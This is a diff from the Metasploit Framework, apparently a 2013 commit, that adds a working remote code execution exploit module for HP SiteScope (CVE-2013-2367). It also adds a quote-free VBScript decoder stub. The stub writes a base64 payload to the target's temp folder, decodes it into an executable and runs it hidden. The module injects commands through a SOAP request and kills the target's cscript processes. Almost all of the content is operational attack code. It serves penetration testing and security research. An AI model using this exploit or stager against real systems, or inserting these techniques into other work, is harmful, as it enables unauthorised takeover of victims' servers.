rapid7 · wchen-r7 · Sep 9, 2013 · Sep 4, 2013 · Sep 4, 2013 · Sep 4, 2013
diff --git a/data/exploits/cmdstager/vbs_b64_noquot b/data/exploits/cmdstager/vbs_b64_noquot
@@ -0,0 +1,49 @@
+echo Dim encodedFile, decodedFile, scriptingFS, scriptShell, emptyString, tempString, Base64Chars, tempDir >>decode_stub
+echo encodedFile = Chr(92)+CHRENCFILE >>decode_stub
+echo decodedFile = Chr(92)+CHRDECFILE >>decode_stub
+echo scriptingFS = Chr(83)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(105)+Chr(110)+Chr(103)+Chr(46)+Chr(70)+Chr(105)+Chr(108)+Chr(101)+Chr(83)+Chr(121)+Chr(115)+Chr(116)+Chr(101)+Chr(109)+Chr(79)+Chr(98)+Chr(106)+Chr(101)+Chr(99)+Chr(116) >>decode_stub
+echo scriptShell = Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(83)+Chr(104)+Chr(101)+Chr(108)+Chr(108) >>decode_stub
+echo emptyString = Chr(84)+Chr(104)+Chr(101)+Chr(32)+Chr(102)+Chr(105)+Chr(108)+Chr(101)+Chr(32)+Chr(105)+Chr(115)+Chr(32)+Chr(101)+Chr(109)+Chr(112)+Chr(116)+Chr(121)+Chr(46)>>decode_stub
+echo tempString  = Chr(37)+Chr(84)+Chr(69)+Chr(77)+Chr(80)+Chr(37) >>decode_stub
+echo Base64Chars = Chr(65)+Chr(66)+Chr(67)+Chr(68)+Chr(69)+Chr(70)+Chr(71)+Chr(72)+Chr(73)+Chr(74)+Chr(75)+Chr(76)+Chr(77)+Chr(78)+Chr(79)+Chr(80)+Chr(81)+Chr(82)+Chr(83)+Chr(84)+Chr(85)+Chr(86)+Chr(87)+Chr(88)+Chr(89)+Chr(90)+Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+Chr(103)+Chr(104)+Chr(105)+Chr(106)+Chr(107)+Chr(108)+Chr(109)+Chr(110)+Chr(111)+Chr(112)+Chr(113)+Chr(114)+Chr(115)+Chr(116)+Chr(117)+Chr(118)+Chr(119)+Chr(120)+Chr(121)+Chr(122)+Chr(48)+Chr(49)+Chr(50)+Chr(51)+Chr(52)+Chr(53)+Chr(54)+Chr(55)+Chr(56)+Chr(57)+Chr(43)+Chr(47) >>decode_stub
+echo Set wshShell = CreateObject(scriptShell) >>decode_stub
+echo tempDir = wshShell.ExpandEnvironmentStrings(tempString) >>decode_stub
+echo Set fs = CreateObject(scriptingFS) >>decode_stub
+echo Set file = fs.GetFile(tempDir+encodedFile) >>decode_stub
+echo If file.Size Then >>decode_stub
+echo Set fd = fs.OpenTextFile(tempDir+encodedFile, 1) >>decode_stub
+echo data = fd.ReadAll >>decode_stub
+echo data = Replace(data, Chr(32)+vbCrLf, nil) >>decode_stub
+echo data = Replace(data, vbCrLf, nil) >>decode_stub
+echo data = base64_decode(data) >>decode_stub
+echo fd.Close >>decode_stub
+echo Set ofs = CreateObject(scriptingFS).OpenTextFile(tempDir+decodedFile, 2, True) >>decode_stub
+echo ofs.Write data >>decode_stub
+echo ofs.close >>decode_stub
+echo wshShell.run tempDir+decodedFile, 0, false >>decode_stub
+echo Else >>decode_stub
+echo Wscript.Echo emptyString >>decode_stub
+echo End If >>decode_stub
+echo Function base64_decode(byVal strIn) >>decode_stub
+echo Dim w1, w2, w3, w4, n, strOut >>decode_stub
+echo For n = 1 To Len(strIn) Step 4 >>decode_stub
+echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub
+echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub
+echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub
+echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub
+echo If Not w2 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>decode_stub
+echo If  Not w3 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>decode_stub
+echo If Not w4 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>decode_stub
+echo Next >>decode_stub
+echo base64_decode = strOut >>decode_stub
+echo End Function >>decode_stub
+echo Function mimedecode(byVal strIn) >>decode_stub
+echo If Len(strIn) = 0 Then >>decode_stub
+echo mimedecode = -1 : Exit Function >>decode_stub
+echo Else >>decode_stub
+echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub
+echo End If >>decode_stub
+echo End Function >>decode_stub
diff --git a/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb b/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb
@@ -0,0 +1,173 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStagerVBS
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'HP SiteScope Remote Code Execution',
+      'Description' => %q{
+          This module exploits a code execution flaw in HP SiteScope.
+        The vulnerability exists on the opcactivate.vbs script, which
+        is reachable from the APIBSMIntegrationImpl AXIS service, and
+        uses WScript.Shell.run() to execute cmd.exe with user provided
+        data. Note which the opcactivate.vbs component is installed
+        with the (optional) HP Operations Agent component. The module
+        has been tested successfully on HP SiteScope 11.20 (with HP
+        Operations Agent) over Windows 2003 SP2.
+      },
+      'Author'       =>
+        [
+          'rgod <rgod[at]autistici.org>', # Vulnerability discovery
+          'juan vazquez' # Metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'CVE', '2013-2367'],
+          [ 'OSVDB', '95824' ],
+          [ 'BID', '61506' ],
+          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-205/' ]
+        ],
+      'Privileged'  => true,
+      'Platform'    => 'win',
+      'Arch'        => ARCH_X86,
+      'Targets'     =>
+        [
+          [ 'HP SiteScope 11.20 (with Operations Agent) / Windows 2003 SP2', {} ]
+        ],
+      'DefaultTarget'  => 0,
+      'DefaultOptions'  =>
+        {
+          'DECODERSTUB' => File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_noquot")
+        },
+      'DisclosureDate' => 'Jul 29 2013'))
+
+    register_options(
+      [
+        Opt::RPORT(8080),
+        OptString.new('TARGETURI', [true, 'Path to SiteScope', '/SiteScope/'])
+      ], self.class)
+  end
+
+  def uri
+    uri = normalize_uri(target_uri.path)
+    uri << '/' if uri[-1,1] != '/'
+    return uri
+  end
+
+  def check
+
+    op = rand_text_alpha(8 + rand(10))
+    key = rand_text_alpha(8 + rand(10))
+    value = rand_text_alpha(8 + rand(10))
+
+    res = send_soap_request(op, key, value)
+
+    if res and res.code == 200 and res.body =~ /runOMAgentCommandResponse/
+      return Exploit::CheckCode::Detected
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    @peer = "#{rhost}:#{rport}"
+
+    print_status("#{@peer} - Delivering payload...")
+
+    # The path to the injection is something like:
+    # * Java exec => cscript => WScript.Shell => cmd.exe (injection happens)
+    # Empirically has been tested a 1500 value for :linemax makes it work
+    # reliable
+    execute_cmdstager({:linemax => 1500})
+  end
+
+  def get_vbs_string(str)
+    vbs_str = ""
+    str.each_byte { |b|
+      vbs_str << "Chr(#{b})+"
+    }
+
+    return vbs_str.chomp("+")
+  end
+
+  # Make the modifications required to the specific encoder
+  # This exploit uses an specific encoder because quotes (")
+  # aren't allowed when injecting commands
+  def execute_cmdstager_begin(opts)
+    var_decoded = @stager_instance.instance_variable_get(:@var_decoded)
+    var_encoded = @stager_instance.instance_variable_get(:@var_encoded)
+    decoded_file = "#{var_decoded}.exe"
+    encoded_file = "#{var_encoded}.b64"
+    @cmd_list.each { |command|
+      # Because the exploit kills cscript processes to speed up and reliability
+      command.gsub!(/cscript \/\/nologo/, "wscript //nologo")
+      command.gsub!(/CHRENCFILE/, get_vbs_string(encoded_file))
+      command.gsub!(/CHRDECFILE/, get_vbs_string(decoded_file))
+    }
+  end
+
+  def execute_command(cmd, opts={})
+    # HTML Encode '&' character
+    # taskkill allows to kill the cscript process which is triggering the
+    # different operations performed by the OPACTIVATE command. It speeds
+    # up exploitation and improves reliability (some processes launched can die
+    # due to the fake activation). But this line also will kill other cscript
+    # legit processes which could be running on the target host. Because of it
+    # the exploit has a Manual ranking
+    command = "&#x22;127.0.0.1 &#x26;&#x26; "
+    command << cmd.gsub(/&/, "&#x26;")
+    command << " &#x26;&#x26; taskkill /F /IM cscript.exe &#x22;"
+
+    res = send_soap_request("OPCACTIVATE", "omHost", command)
+
+    if res.nil? or res.code != 200 or res.body !~ /runOMAgentCommandResponse/
+      fail_with(Failure::Unknown, "#{@peer} - Unexpected response, aborting...")
+    end
+
+  end
+
+  def send_soap_request(op, key, value)
+    data = "<soapenv:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" "
+    data << "xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:api=\"http://Api.freshtech.COM\">"
+    data << "<soapenv:Header/>"
+    data << "<soapenv:Body>"
+    data << "<api:runOMAgentCommand soapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
+    data << "<in0 xsi:type=\"x-:Map\" xmlns:x-=\"http://xml.apache.org/xml-soap\">"
+    data << "<item xsi:type=\"x-:mapItem\">"
+    data << "<key xsi:type=\"xsd:string\">#{key}</key>"
+    data << "<value xsi:type=\"xsd:string\">#{value}</value>"
+    data << "</item>"
+    data << "</in0>"
+    data << "<in1 xsi:type=\"xsd:string\">#{op}</in1>"
+    data << "</api:runOMAgentCommand>"
+    data << "</soapenv:Body>"
+    data << "</soapenv:Envelope>"
+
+    res = send_request_cgi({
+      'uri'      => normalize_uri(uri, 'services', 'APIBSMIntegrationImpl'),
+      'method'   => 'POST',
+      'ctype'    => 'text/xml; charset=UTF-8',
+      'data'     => data,
+      'headers'  => {
+        'SOAPAction' => '""'
+      }
+    })
+
+    return res
+  end
+
+end